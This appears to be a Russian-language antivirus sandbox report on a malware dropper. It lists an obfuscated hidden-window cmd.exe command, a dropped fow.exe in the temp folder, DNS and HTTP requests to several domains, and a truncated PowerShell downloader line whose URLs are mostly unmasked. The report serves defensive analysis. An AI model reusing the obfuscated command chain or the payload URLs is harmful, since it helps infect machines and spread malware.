Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c c^m%AlLUSersPRoFILE:~ +10,+1%, , , , /v^:^o , /r " , (^SeT ^ ^6^qRY=^m^j ^ L n8 ^t^b ^WS^ 8T KU x^o u^ z^1 OZ^ hv kL ^j^I AV nH X^2 5^U^}L^D}^Mr^{^an^h^JWc^3Dty^aa8^acXE}cE^}^ ^6kqr^...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\fow.exe
Сетевая активность
Подключается к
- 'lo##.drr.go.th':80
- 'so####velopment.ge':80
- 'ch###rkeco.com':80
- 'dj###mic.com':80
TCP
Запросы HTTP GET
- http://lo##.drr.go.th/wp-content/rrQwQyT
- http://so####velopment.ge/mgWzKAl4
- http://ch###rkeco.com/VzKuhE0o
- http://dj###mic.com/nUDwS3Weo
UDP
- DNS ASK cl###.noixun.com
- DNS ASK lo##.drr.go.th
- DNS ASK so####velopment.ge
- DNS ASK ch###rkeco.com
- DNS ASK dj###mic.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c c^m%AlLUSersPRoFILE:~ +10,+1%, , , , /v^:^o , /r " , (^SeT ^ ^6^qRY=^m^j ^ L n8 ^t^b ^WS^ 8T KU x^o u^ z^1 OZ^ hv kL ^j^I AV nH X^2 5^U^}L^D}^Mr^{^an^h^JWc^3Dty^aa8^acXE}cE^}^ ^6kqr^...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' , , , , /v:o , /r " , (^SeT ^ ^6^qRY=^m^j ^ L n8 ^t^b ^WS^ 8T KU x^o u^ z^1 OZ^ hv kL ^j^I AV nH X^2 5^U^}L^D}^Mr^{^an^h^JWc^3Dty^aa8^acXE}cE^}^ ^6kqr^a^w^ eJrr^Y^1bj^D^;^g^3^G^lBJ30LQ^...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $ivP='uJz';$fuw='http://cl###.noixun.com/9bBl88KkQJ@http://loei.drr.go.th/wp-content/rrQwQyT@http://solodevelopment.ge/mgWzKAl4@http://chstarkeco.com/VzKuhE0o@http://djlilmic.com/nUDwS3Weo'.Spl...
